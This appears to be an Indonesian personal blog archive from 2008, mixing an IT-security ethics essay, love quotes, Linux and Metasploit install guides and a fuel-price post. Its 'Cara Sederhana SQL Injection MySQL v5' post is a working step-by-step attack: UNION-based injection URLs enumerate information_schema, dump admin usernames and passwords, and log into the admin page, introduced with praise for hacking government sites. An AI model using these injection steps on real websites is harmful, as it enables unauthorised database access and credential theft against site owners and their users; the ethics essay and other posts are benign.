Anda mengerti bahwa itu melanggar peraturan perusahaan untuk mengirim dokumen rahasia yang tidak di enkripsi terleih dahulu keluar dari jaringan perusahaan. Bagaimanapun juga, anda dibawah "deadline" yang ketat dan memerlukan dengan segera mengirimkan dokumen tersebut kepada asisten anda yang dimana bekerja dirumah anda. Ini mungkin bukan suatu masalah yang besar, benarkan?

Konservatif: anda seharusnya dengan alasan apapun juga mengirimkan dokumen yang tidak dienkripsi terlebih dahulu keluar dari jaringan perusahaan. Anda salah pada poin ini. Anda tentunya tidak menunjukkan contoh yang bagus pada perusahaan akan nilai etis dari "secure code & secure environment".

Liberal: kasus ini mungkin berlaku untuk orang yang belum paham benar dengan "secure code & secure environment" tapi itu tidak berlaku untuk anda yang bertanggung jawab akan kerahasiaan pengiriman data perusahaan.

saran

-------------------

anda mungkin menyaksikan pegawai lain membuat kesalahan ini tapi itu bukan suatu toleransi untuk staff IT seperti anda.

-------------------


--| Victim of Industrial Espionage - tanggung jawab siapa ?

Seorang kompetitor berhasil "menyadap" sebuah "e-mail" antara "CEO" perusahaan anda dan mitra kerja perusahaan anda, yang dimana memuat informasi yang sangat rahasia. "CEO" gagal untuk melakukan enkripsi walaupun tersedia aplikasi enkripsi di komputernya. Apakah ini salah anda?

Konservatif: jika "CEO" tidak melakukan enkripsi pada "e-mail" yang memuat data rahasia, anda tidak melakukan pekerjaan anda dengan benar sebagai pemahaman akan keamanan data maka semua kesalahan akan dialamatkan kepada anda . Tugas dari staff yang bertanggung jawab adalah mengamankan data perusahaan dan system beserta jaringannya. Ini termasuk mengajarkan dan melatih pegawai dan pejabat akan apa yang harus mereka lakukan untuk memastikan akan privasi dan keamanan.

Liberal: sejak "CEO" sudah mempunyai aplikasi enkripsi di komputernya sendiri, ini bukan kesalahan anda sepenuhnya jika dia gagal atau tidak mampu menggunakannya. Kegagalan ini bagian dari yang dihasilkan "CEO" sehingga kompetitor sekarang mempunyai akses ke data yang paling sensitif di perusahaan anda.

saran

-------------------

Konsultasikanlah terlebih dahulu akan pentinganya persiapan, pemahaman dan implementasi privasi dan keamanan data kepada seluruh karyawan dan pejabat di perusahaan anda sebelum mulai menggunakan aplikasi nekripsi dan mengirimkan data kepada mitra kerja perusahaan.

-------------------

--| In Industrial Espionage Ethical? - biasakah dilakukan ?

Seperti contoh diatas, apakah kompetitor yang "menyadap" "e-mail" telah bertindak etis ?

Konservatif: tidak!. "menyadap" "e-mail" dan mencuri data sensitif perusahaan lain sangatlah tidak etis dan merupakan kegiatan yang jelek. Sangatlah tidak perlu untuk mengambil "keuntungan" agar dapat lebih maju dari yang lain. Liberal: "all is fair in love and war", kompetitor lebih tahu perusahaan anda daripada anda mengetahui diri anda sendiri dan mengawasi kelemahan keamanan. Anda harus mengantisipasi tipe dari aksi ini didalam dunia perindustrian dan harus bersiap sedia untuk keadaan itu.

saran

-------------------

Pengintaian industri adalah kegiatan dimana mencuri data dan ide dari perusahaan lain, yang dimana biasa dilakukan. Semua bisnis perlu untuk menjaga komputer, dokumen penting, personil dan kantor dari kegiatan seperti ini.

-------------------

-- -- -( Handling Network Security Information )-

Keamanan informasi dalam jaringan komputasi adalah untuk melaporkan apabila terdapat kelemahan atau tidak berfungsinya dan penyusupan yang mempengaruhi keamanan dari sebuah jaringan komputasi.

--| Software Malfunctions - haruskah anda melaporkannya ?

Seorang pegawai dari perusahaan anda gagal dalam melaporkan bahwa sebuah perangkat lunak mengalami kegagalan system, yang dimana menyebabkan data terekspos keluar ke internet. Apakah kegagalan untuk melaporkan insiden tersebut tidak etis ?

Konservatif: kegagalan dalam melaporkan tidak berfungsinya keamanan system sama burukna dengan membuat itu sendiri. Jika staff IT tidak waspada pada masalah yang terjadi di system, mereka secara tidak langsung tidak mampu untuk melindungi sumber daya system beserta informasi didalamnya.

Liberal: pegawai tersebut mungkin tidak mengerti lebih jauh mengenai masalah itu dan gagal dalam melaporkan insiden itu dikarenakan mereka tidak mengerti resiko yang dihadapi yang menyangkut secara keseluruhan dari keamanan informasi. Dia tidak melakukan sesuatu yang tidak etis.

saran

-------------------

Staff IT menyediakan perhatian yang lumayan akan kewaspadaan terhadap keamanan sehingga masalah diatas tidak akan pernah muncul. Jika pegawai telah mepersiapkan sedikit perhatian dan tetap gagal dalam menyediakan laporan insiden, maka mereka sudah memasuki batas dari lemahnya tanggung jawab kepada perusahaan.

-------------------

--| Stealth Sniffer - meningkatkan keamanan.

Anda menemukan sebuah aplikasi pengendus (sniffer) yang sedang mengawasi jaringan anda. Apakah seseorang mempunyai hak untuk aktifitas ini? Konservatif: tidak ada seorangpun yang berhak untuk mengawasi jaringan anda. Aktifitas ini sangat tidak etis dan harus ditindak lanjuti, apakah orang ini adalah pegawai dari perusahaan tempat anda bekerja atau seorang kompetitor perusahaan yang terlibat dalam pengintaian industri (industry espionage). Liberal: bila jaringan komputasi anda tidak aman, maka anda mengundang sebuah serangan dan pengintai. Perhatikan masalah yang ditimbulkan dari orang ini apa bila dia menjalankan "sniffer" dan mengawasi jaringan komputasi anda.

saran

-------------------

Staff IT harus memastikan tanggung jawab pada semua aspek dari penyusupan jaringan komputasi. Mereka harus segera meningkatkan keamanan system untuk menghindari aktifitas tersebut; bagaimanapun juga, anda sebagai orang yang bertanggung jawab akan keamanan jaringan komputasi, telah gagal bertindak sebagaimana seharusnya jika anda tidak melakukan sesuatu untuk menanggulanginya.

-------------------

-- -- -( Ensuring Information Security on the Personnel Level )-

Staff IT juga bertanggung jawab pada tinkat personil. Masalah seperti berbohon kepada klien akan integritas dari keamanan informasi pada jaringan komputasi merupakan tanggung jawab anda.

--| Lying to Clients Regarding Corporate Security - apakah ini ide bagus ?

Pimpinan anda meminta untuk memberitahu kepada klien bahwa keamanan jaringan komputasi perusahaan sangat bagus, yang dimana mustahil untuk disusupi. Anda, sebegai orang yang bertanggung jawab atas keamanan jaringan komputasi perusahaan ini bukan intinya. System akan aman sebagaimana seharusnya, tapi tidak ada suatu system yang benar-benar aman dari serangan. Bagaimanapun juga, kebanyakan dari marketing kompetitor melakukan propaganda yang mengatakan bahwa mereka mempunyai system yang tidak dapat disusupi. Dapatkah anda dengan bangga mengeluarkan pernyataan ini kepada klien untuk pimpinan anda?

Konservatif: sebegai orang yang bertanggung jawab, anda harus menjaga ketingkat yang paling tinggi dari integritas. Jangan pernah katakan apapun apabila itu tidak benar. Jika pimpinan anda atau staff dari marketing sedang membuat pernyataan palsu tentang keamanan system, segera diralat pada ketidak akuratan pernyataan itu. Menjanjikan sesuatu yang benar-benar aman pada perlindungan system sangatlah tidak mungkin dan kemungkinan besar adalah bohong besar.

Liberal: anda dapat membuat pernyataan kepada klien bahwa indikasi infrastruktur seaman yang anda bisa implementasikan dari segenap kemampuan anda. Katakan itu dengan cara yang dapat membuat mereka merasa percaya terhadap keamanan system perusahaan tanpa harus membuat sebuah pernyataan palsu akan garansi pada keamanan absolut, yang dimana itu merupakan mustahil.

saran

-------------------

Kegairahan marketing sering menimbulkan kesamaran pada system informasi. Seorang staff IT perlu untuk menjadi "kuat" terhadap pengaruh mereka akan komunikasi yang di distribusikan oleh marketing dan departemen lain. Seorang staff IT harus memastikan bahwa tidak ada yang dikatakan akan dibalikkan untuk menjatuhkan perusahaan apabila pernyataan itu ternyata tidak akurat atau salah.

-------------------


Doing the Right Thing Under the Pressure of Sales

Some time ago I headed security efforts for a company that provided Web-based financial services as an Application Service Provider (ASP). My responsibilities included interacting with potential clients and explaining the safeguards we had in place to ensure confidentiality and availability of our service. My first sales engagement was a meeting with one of the companys earliest prospective customers.

One of the clients concerns was our lack of a disaster recovery facility that would forestall service interruption if the primary site became inaccessible. Our sales associate reassured the representatives, The secondary data center will be operational by the end of the month. They looked at me for confirmation.

I hesitated for a moment, knowing that my colleague was exaggerating our preparedness. By correcting him, I might jeopardize this critical deal. On the other hand, with a simple nod I would be supporting a commitmentwe probably could not keep. I wanted to say yes, realizing how important the disaster recovery site was to closing this deal, and how much we needed this client.

Our company considered this engagement a cornerstone in our development, a way of demonstrating to other prospects the markets acceptance of our product. There was a good chance of closing the deal at that meeting if I could commit to having the site ready in time. The secondary data center was being built, but we were unlikely to finish it by the end of the month. I would be misleading the client by promising to have the site ready so quickly.

We are in the process of setting up the secondary data center, I explained. I will check the estimated completion date, but there is a chance the site will not be ready by the end of the month. Although we did not close the sale that afternoon, the client did sign up for our service once the disaster recovery site was completed in the following month. When the sales pressure is on, it may be tough to do the right thing. Sometimes it is tough to determine what the right thing is.

- Mark Markevitch

Independent Consultant

-- -- -( Conclusion )-

Saat ini kita telah melihat beberpa pertimbangan etis pada peran teknologi dari seorang staff IT. Kita telah melihat nilai etis dari "hacking", yang dimana disertakan apakah ada keadaan ketika "hacking"

menjadi sesuatu yang secara etis benar. Sekarang anda telah belajar pada tingkat toleransi pada system yang sedang anda tangani dan bagaimana cara yang secara etis benar untuk menyelesaikan apabila suatu masalah pada akhirnya muncul juga ke permukaan. Sehingga pada saat ini anda lebih paham akan pengetahuan mengenai tanggung jawab secara etis dari seorang staff IT.

-- -- -( FAQ (Frequently Asked Questions) )-

Q: Apakah benar secara etis untuk melakukan "hacking" terhadap sebuah system yang bukan kepunyaan anda sendiri ?

A: Dalam banyak kasus anda harus menghindari aktifitas "hacking" terhadap system komputasi yang tidak anda miliki atau anda bertanggung jawab atasnya, ini akan menempatkan karir anda pada bahaya. Bahkan jika staff senior meminta anda untuk melakukan "hacking" terhadap system kompetitor. Keadaan yang melegalkan anda untuk melakukan hacking adalah untuk kepentingan pemerintah dan militer yang dimana anda bertanggung jawab untuk melindungi orang yang tidak berdosa (patriotism).

Q: Apakah benar untuk melakukan test penetrasi yang tidak diizinkan terhadap system yang berada dibawah tanggung jawab anda ?

A: Lagi, dalam banyak kasus, jawabannya adalah tidak!. Melakukan tes penetrasi yang tidak diizinkan dapat menyebabkan system anda berada dalam bahaya. Bagaimanapun juga, apabila anda melakukannya didalam lab komputasi perusahaan ini mungkin dapat diterima dalam peran anda sebagai staff IT yang bertanggung jawab atas keamanan dan kerahasiaan jaringan komputasi perusahaan tempat anda bekerja.

Q: Apakah anda, staff IT, bersalah jika system yang anda lindungi sering diserang oleh virus ?

A: Jawabannya adalah... YA!, anda bertanggung jawab untuk melindungi system dari serangan virus. Mungkin ada dibeberapa keadaan dimana tidak ada yang dapat anda lakukan ataupun perusahaan untuk melindungi tipe serangan seperti ini. Setidaknya, anda harus bisa secara signifikan dapat melindungi system dari kebanyakan tipe serangan ini jika anda mempunyai sumber daya dan kemampuan untuk melakukannya.

Q: Apakah benar untuk mengirimkan data rahasia lewat e-mail tanpa dilakukan enkripsi terlebih dahulu ?

A: Mengirimkan data rahasia tanpa di enkripsi terlebih dahulu tidak dapat diterima. Dapat dimaafkan jika pengirim tidak waspada akan keamanan data dan kerahasiaannya. Bagaimanapun juga, ini merupakan kesalahan staff IT dikarenakan tidak mengkomunikasikan secara benar akan keamanan untuk kepentingan perusahaan.

Q: Bagaimana seharusnya anda menghadapi permintaan untuk berbohong kepada kompetitor peusahaan akan keamanan dari system, yang dimana merupakan tanggung jawab anda sebagai staff IT.

A: Jangan pernah bohong tentang keamanan dari system yang anda tangani. Anda dapat mengaris bawahi beberapa poin penting tapi jangan pernah mengatakan bahwa system anda tidak dapat disusupi demi kepentingan marketing.

-- -- -( Praise )-

+ JC for wealthy life.
+ Jim G. For the conversation after hours. (ussualy midnite on IM).
+ Friends who I'cant mentioned here one by one, you guys are great.
+ fuzk3 (where's the iPod dude?), SJ (where's my order...??), and many other
+ 1stlink, aikmel, e-c-h-o and other covert channel. :)
+ the muse and the rasmus for accompany me late at night.
+ My future wife, eGLa & for her understanding all these years.


-- -- -( Reference )-

[+] IT Ethics Handbook: Right and Wrong for IT Professionals, Syngress Publishing.
[+] Related Material on Internet (forum, web board, articles, white papers, etc.)
[+] www.google.co.id
[+] www.ezine.echo.or.id
[+] echo|zine, volume 4, issue 13

More aboutDilema Etika IT Security Professional

Cara Sederhana SQL Injection MySQL v5

Diposting oleh fitri-ariyanto on Saturday, November 29, 2008

Komunitas hacker Tanah Air semakin muncul dan melahirkan Hacker-hacker muda berbakat. Berbagai site, server, tak luput dari serangan-serangan anak bangsa. Bahkan situs pemerintah Negara pun tak luput dari serangan. Dari sinilah jati diri seorang hacker akan diuji. Bahwa hacker itu tidak merusak sebuah system yang telah ia hack, bila seorang hacker adalah perusak, itu tak lain adalah seorang cracker(perusak) dan bukan hacker.
Saya sendiri bukan seorang hacker, (masih newbies.. alias orang yang pengen jadi hacker dan masih dalam tahap belajar, belajar, berlatih dan mencoba.
Viva Indonesian Hacker!
check it out!

Pertama cari targetnya. Atau gunakan link berikut biar cepet:

http://72.14.205.100/ ^_^

Misal Kita dapet yang ini:

http://site.com/vuln.php?id=1′ <- errorkita coba cari nama databasenya http://site.com/vuln.php?id=1 union all select 0 from admin


didapat nama databasenya bego

http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables

belum berhasil kita cari jumlah kolomnya

http://site.com/vuln.php?id=1 order by 9/* tidak eror http://site.com/vuln.php?id=1 order by 10/*

eror maka diambil kesimpulan kolomnya berjumlah 9

http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

tidak didapat apa2 tambahkan (-) didepan belakang (=)

http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

didapat angka 3 untuk mencari nama tabelnya, angka 3 kita ganti dengan table_name

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’/*

didapat nama tabel tblArsipuntuk mencari nama2 tabel lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 4,1/*

sampe gak ada lagi tanda yang muncul di monitormisalkan kita mendapatkan nama tabelnya adalah tbl User sekarang kita akan mencari nama2 kolomnyauntuk mencari nama tabelnya, angka 3 kita ganti dengan column_name

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’/*

didapat nama kolomnya UserNameuntuk mencari nama2 kolom lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 4,1/*

didapat nama kolom UserName, UserLogin, UserPass, UserMailsetelah dapat nama kolom dan tabelnya kita masukkan

http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser

http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser

didapat loginnya admin didapat passnya 1234 tinggal kita cari halaman admin. Misalnya kita temukan

http://site.com/admin.php

tinggal kita masukkan aja
loginnya:admin
passwordnya:1234

author: Andr3^81

referensi
http://andr381.wordpress.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/
More aboutCara Sederhana SQL Injection MySQL v5

Kata Mutiara 1

Diposting oleh fitri-ariyanto on Monday, November 24, 2008

Tuhan memberi kita dua kaki untuk berjalan, dua tangan untuk memegang, dua telinga untuk mendengar dan dua mata untuk melihat. Tetapi mengapa Tuhan hanya menganugerahkan sekeping hati pada kita? Karena Tuhan telah memberikan sekeping lagi hati pada seseorang untuk kita mencarinya. Itulah namanya Cinta.

Cinta tidak pernah meminta, ia sentiasa memberi, cinta membawa penderitaan, tetapi tidak pernah berdendam, tak pernah membalas dendam. Di mana ada cinta di situ ada kehidupan; manakala kebencian membawa kepada kemusnahan.~ Mahatma Ghandi

Ada 2 titis air mata mengalir di sebuah sungai. Satu titis air mata tu menyapa air mata yg satu lagi,” Saya air mata seorang gadis yang mencintai seorang lelaki tetapi telah kehilangannya. Siapa kamu pula?”. Jawab titis air mata kedua tu,” Saya air mata seorang lelaki yang menyesal membiarkan seorang gadis yang mencintai saya berlalu begitu sahaja.”

Cinta sejati adalah ketika dia mencintai orang lain, dan kamu masih mampu tersenyum, sambil berkata: aku turut bahagia untukmu.

Jika kita mencintai seseorang, kita akan sentiasa mendoakannya walaupun dia tidak berada disisi kita.

Jangan sesekali mengucapkan selamat tinggal jika kamu masih mau mencoba. Jangan sesekali menyerah jika kamu masih merasa sanggup. Jangan sesekali mengatakan kamu tidak mencintainya lagi jika kamu masih tidak dapat melupakannya.

Perasaan cinta itu dimulai dari mata, sedangkan rasa suka dimulai dari telinga. Jadi jika kamu mahu berhenti menyukai seseorang, cukup dengan menutup telinga. Tapi apabila kamu Coba menutup matamu dari orang yang kamu cintai, cinta itu berubah menjadi titisan air mata dan terus tinggal dihatimu dalam jarak waktu yang cukup lama.

Cinta datang kepada orang yang masih mempunyai harapan walaupun mereka telah dikecewakan. Kepada mereka yang masih percaya, walaupun mereka telah dikhianati. Kepada mereka yang masih ingin mencintai, walaupun mereka telah disakiti sebelumnya dan kepada mereka yang mempunyai keberanian dan keyakinan untuk membangunkan kembali kepercayaan.

Jangan simpan kata-kata cinta pada orang yang tersayang sehingga dia meninggal dunia , lantaran akhirnya kamu terpaksa catatkan kata-kata cinta itu pada pusaranya . Sebaliknya ucapkan kata-kata cinta yang tersimpan dibenakmu itu sekarang selagi ada hayatnya.

Mungkin Tuhan menginginkan kita bertemu dan bercinta dengan orang yang salah sebelum bertemu dengan orang yang tepat, kita harus mengerti bagaimana berterima kasih atas kurniaan itu.

Cinta bukan mengajar kita lemah, tetapi membangkitkan kekuatan. Cinta bukan mengajar kita menghinakan diri, tetapi menghembuskan kegagahan. Cinta bukan melemahkan semangat, tetapi membangkitkan semangat -Hamka

Cinta dapat mengubah pahit menjadi manis, debu beralih emas, keruh menjadi bening, sakit menjadi sembuh, penjara menjadi telaga, derita menjadi nikmat, dan kemarahan menjadi rahmat.

Sungguh menyakitkan mencintai seseorang yang tidak mencintaimu, tetapi lebih menyakitkan adalah mencintai seseorang dan kamu tidak pernah memiliki keberanian untuk menyatakan cintamu kepadanya.

Hal yang menyedihkan dalam hidup adalah ketika kamu bertemu seseorang yang sangat berarti bagimu. Hanya untuk menemukan bahawa pada akhirnya menjadi tidak bererti dan kamu harus membiarkannya pergi.

Kamu tahu bahwa kamu sangat merindukan seseorang, ketika kamu memikirkannya hatimu hancur berkeping.
Dan hanya dengan mendengar kata “Hai” darinya, dapat menyatukan kembali kepingan hati tersebut.

Tuhan ciptakan 100 bahagian kasih sayang. 99 disimpan disisinya dan hanya 1 bahagian diturunkan ke dunia. Dengan kasih sayang yang satu bahagian itulah, makhluk saling berkasih sayang sehingga kuda mengangkat kakinya kerana takut anaknya terpijak.

Kadangkala kamu tidak menghargai orang yang mencintai kamu sepenuh hati, sehinggalah kamu kehilangannya. Pada saat itu, tiada guna sesalan karena perginya tanpa berpatah lagi.

Jangan mencintai seseorang seperti bunga, kerana bunga mati kala musim berganti. Cintailah mereka seperti sungai, kerana sungai mengalir selamanya.

Cinta mampu melunakkan besi, menghancurkan batu, membangkitkan yang mati dan meniupkan kehidupan padanya serta membuat budak menjadi pemimpin. Inilah dasyatnya cinta !

Permulaan cinta adalah membiarkan orang yang kamu cintai menjadi dirinya sendiri, dan tidak merubahnya menjadi gambaran yang kamu inginkan. Jika tidak, kamu hanya mencintai pantulan diri sendiri yang kamu temukan di dalam dirinya.

Cinta itu adalah perasaan yang mesti ada pada tiap-tiap diri manusia, ia laksana setitis embun yang turun dari langit,bersih dan suci. Cuma tanahnyalah yang berlain-lainan menerimanya. Jika ia jatuh ke tanah yang tandus,tumbuhlah oleh kerana embun itu kedurjanaan, kedustaan, penipu, langkah serong dan lain-lain perkara yang tercela. Tetapi jika ia jatuh kepada tanah yang subur,di sana akan tumbuh kesuciaan hati, keikhlasan, setia budi pekerti yang tinggi dan lain-lain perangai yang terpuji.~ Hamka

Kata-kata cinta yang lahir hanya sekadar di bibir dan bukannya di hati mampu melumatkan seluruh jiwa raga, manakala kata-kata cinta yang lahir dari hati yang ikhlas mampu untuk mengubati segala luka di hati orang yang mendengarnya.

Kamu tidak pernah tahu bila kamu akan jatuh cinta. namun apabila sampai saatnya itu, raihlah dengan kedua tanganmu,dan jangan biarkan dia pergi dengan sejuta rasa tanda tanya dihatinya

Cinta bukanlah kata murah dan lumrah dituturkan dari mulut ke mulut tetapi cinta adalah anugerah Tuhan yang indah dan suci jika manusia dapat menilai kesuciannya.

Bukan laut namanya jika airnya tidak berombak. Bukan cinta namanya jika perasaan tidak pernah terluka. Bukan kekasih namanya jika hatinya tidak pernah merindu dan cemburu.

Bercinta memang mudah. Untuk dicintai juga memang mudah. Tapi untuk dicintai oleh orang yang kita cintai itulah yang sukar diperoleh.
Satu-satunya cara agar kita memperolehi kasih sayang, ialah jangan menuntut agar kita dicintai, tetapi mulailah memberi kasih sayang kepada orang lain tanpa mengharapkan balasan.
More aboutKata Mutiara 1

Angry IP Scanner Ubuntu Linux

Diposting oleh fitri-ariyanto on Wednesday, August 13, 2008

Secara default, linux Ubuntu tidak / belum ada fasilitas atau tools untuk meneriksa ( scanning ) Local Area Network (LAN), berapa komputer yang terkoneksi dengan komputer kita.. Dalam kesempatan kali ini, sedikit ilmu yang mungkin dapat memberi wawasan dan pengetahuan penulis bagaimana kita mendapatkan tool tersebut serta kita dapat mengistall dalam OS Linux Ubuntu. Ya, kalu di Win*** tinggal kita download trus digunakan, udah dech..^^ kalu dalam linux gimana..? ya semoga saja kali ini mampu mempengaruhi pembaca sekalian untuk beralih dalam Linux..hehehe bebas PUNGLI ( Pungutan Lisensi )

Si-keren ini udah banyak perkembangan dan sekarang telah mencapai umur yang ke 3.0 tapi beta..hehehe
saat ini penulis menggunakan OS Linux Ubuntu Hardy 8.04 yang gokil abies...:P jadi disini kita menggunakan paket debian. Tp bila kawan-kawan sekalian menggunakan Os Lain dapat pula surfing DISINI

untuk mendownload angry ip scanner dapat didonlot pada halaman ini atau klik DISINI

untuk installasi, seperti biasa silahkan anda login sebagai root ato ketik


root@n3wb135:# sudo -i
----------
root@n3wb135:# apt-get install ipscan_3.0-beta3_i386.deb
----------
----------------

klu semua proses sudah selesai, silahkan cek pada bagian Aplications >> internet >> Angry IP Scanner..

sekian dulu tips dari saya.. ada kurang dan lebihnya silahkan kirim kritik dan saran yang membangun tentunya ^^

salam,
lfay

More aboutAngry IP Scanner Ubuntu Linux

Install Metasploit di Ubuntu linux

Diposting oleh fitri-ariyanto on Tuesday, July 08, 2008

Secara default memang aplikasi pendukung internet memang tidak terpasang metasploit framework, akhirnya setelah berselancar di sana sini, ketermu juga bagaimana cara memasang Metasploit Framework.

Sebelum memulai pemasangan ada baiknya kita ketahui dulu apa itu Metasploit. Metasploit adalah sebuah aplikasi dimana terdapat berbagai macam exploit untuk meng-exploitasi sebuah komputer bahkan sebuah web server / website. Jadi dengan singkat kata metasploit ini dapat kita gunaken untuk membajak ( Hacking ) sebuah server.. wuih... keren ga..??

Langsung saja ke intai permasalahan, apa saja yang dibutuhkan untuk memasang Metasploit Framework.
1. Komputer / PC ( ya harus dong!!, kalau kagak ada mana mungkin kita bisa memasang nya ... :D )
2. Cemilan
3. Winamp / musik
4. Software Metasploit Framework
5. Pikiran yang santai, tenang, n rileks pokonya
6. yang paling penting Online Internet ( ini neh yang agak berat... mungkin instal di Laptop rekan-rekan saja)

untuk software dapat di download ------------------DISINI-------------------

Oke saya anggap rekan-rekan sekalian udah dapet software-nya
untuk instalasi langkah-langkahnya
1. Buka terminal rekan-rekan kemudian ketikkan


$ sudo apt-get install ruby libruby rdoc

$ sudo apt-get install libyaml-ruby

$ sudo apt-get install libzlib-ruby

$ sudo apt-get install libopenssl-ruby

$ sudo apt-get install libdl-ruby

$ sudo apt-get install libreadline-ruby

$ sudo apt-get install libiconv-ruby

$ sudo apt-get install rubygems


setelah semua paket sudah didownload dari internet tentunya, selanjutnya masuk ke-direktori software Metasploit Framework lewat terminal tentunya..kemudian ketik

$ tar -zxvf framework-3.1.tar.gz

masuk kedirektori

$ cd /framework-3.1

untuk update silahkan ketik..

$ svn update

Apabila svn rekan tidak terdeteksi atau belum terinstal, ketikan perintah pada terminal anda

$ sudo apt-get install subversion


Terakhir, untuk menjalankannya ketik ja

$ ./msfconsole


apabila telah sukses memasang metasploit, akan ada tampilan diterminal anda kurang lebih seperti ini


## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

untuk perintah-perintah lainya, bagaimana kita meng-eksploitasi server.. tunggu artikel saya selanjutnya..

More aboutInstall Metasploit di Ubuntu linux

Migrasi ke Linux yuk..

Diposting oleh fitri-ariyanto on Friday, July 04, 2008

Akhirnya setelah menunggu berhari-hari, datang juga ubuntu linux yang gue pesen dari shipit.ubuntu. Penantian lama telah usai..hehehe (kayak apa j neh..)

tanpa pikir panjang akhirnya aku instal ubuntu dengan menduakan si Win ( ukh...kata MUI neh software bajakan tuh haram..gimana tu? masak ilmu yang kita dapet juga haram?? kan percuma..tapi juga nda semua..:D)

Saat ini juga masih berselancar dengan sang Ubuntu 8.04, langsung dech mengKompori temen2 ( meng-kompori = propokator ) buat ganti linux. Yach lumayan juga yang tertarik, tapi malah masih pada berat ninggalin si-Dia ( si-Dia = WinXXX ).

Sekalian untuk info yang mau DOWNLOAD software OS distro linux, dari pada bingung-bingung mending langsung kunjung disini

--- http://repo.ugm.ac.id/iso --- atau klik DISINI ( biar cepet )

Nah disistu, selain banyak sekali distro linux ( hampir 50 distro buset dah...:D ) juga deket sama komputer kita, kan cuma di jogja saja dah deket, free, pokoknya enak dech pakek linux..
More aboutMigrasi ke Linux yuk..

Aku kembali dilahirkan..

Diposting oleh fitri-ariyanto on Tuesday, May 20, 2008

Tepat tanggal 18 Mei 2008, tepat juga hari itu aku dilahirkan pada tanggal 18 Mei 1988, tanpa terasa aku sudah berumur 20 tahun :(, genap pula kau berkepala 2.

semoga saja hari² yang aku lalui bisa lebih bermakna dan berarti dari hari² masa muda dulu.

amin..

Genap pula 2 x 24 jam aku hidup selama 20 tahun..banyak sekali halangan,rintangan,suka,duka,sedih,susah,bahagia yang aku lalui sendirian..tanpa ada seseorang yang setia menemani aku..

hanya 1 yang sangat setia kemanapun aku pergi, kemanapun aku beranjak..
( Laptop-Q )
bener dech..kagak ada yang lebih setia dari cintaku yang satu ini..hehehe
buat cintaku kedua..(maafin aku ya..aku jarang maen sama kamu, aku jarang bercinta sama kamu lagi.. kita jarang bersama²), maafin aku telah menduakan kamu, aku tau aku salah..sekarang aku juga jarang bersama dia sayang...

untuk cinta pertamaku ( MS. Visual Basic hehehe..) aku akan selalu merindukan kamu sayang..
buat cintaku yang lain ( Delphi ..@waduh tambah gila neh..heheh ) tenanglah cinta..kita akan bercinta tanpa waktu lagi..tunggu aku, biar aku dapet MODUL untuk mempelajari kamu dan bersenang² dengan kamu..

Sekilas INFO:
maaf saudara² yang diatas tu orang ngawur..tapi berita 10000000% akurat dan tepat pada sasaranya..hehe,untuk lebih jelasnya silahkan....( halah apapula ini cak...?)

sekian terimakasih..
More aboutAku kembali dilahirkan..

Tabel simulasi harga BBM di Indonesia

Diposting oleh fitri-ariyanto on Friday, May 16, 2008

Meski harga minyak naik hingga US$ 100 per barrel, dengan harga BBM yang sekarang Indonesia akan tetap untung sebesar US$ 18 milyar atau rp 168 trilyun per tahun. Kenapa? Karena produksi minyak dalam negeri jauh lebih besar ketimbang impor. Berikut datanya.

Kebutuhan Dalam Negeri : 377,045,000 barrel/tahun

Produksi Dalam Negeri : 350,400,000 barrel/tahun

Ekspor: 234,000,000 barrel/tahun

Impor : 278,000,000 barrel/tahun

Harga minyak LN: 100 US$/barrel

Harga premium DN: 4,500 Rp/liter

Harga premium DN (dollar/barrel) : 78 US$/barrel

Biaya pengolahan minyak/brl : 15 US$/barrel

Catatan: 1 barrel = 159 liter, dan kurs 1 USD=Rp 9.200

Tabel Hasil Simulasi



Anda juga bisa mendownload file xls untuk mensimulasikan kenaikan harga minyak dengan merubah variabel harga minyak LN (warna kuning) dari 100 menjadi 80 atau 200 (terserah anda). Pada semua angka di atas Indonesia tetap untung. Bahkan pada harga US$ 200/barrel pun Indonesia tetap untung US$ 13,9 milyar (Rp 127 trilyun). Untuk mendownload klik:

http://www.mediafire.com/?4gtgahbae4j

Jika perhitungan di atas cukup rumit. Bisa download simulasi di mana ekspor dihilangkan dan perhitungan berdasarkan hari (bukan tahun). Jadi yang dipakai adalah produksi dalam negeri 1 juta bph (bisa dirubah sesuai update data terakhir), kebutuhan dalam negeri 1,2 juta bph (barrel per hari), dan impor 200 ribu bph.

http://www.mediafire.com/?4gdbwgez1gd

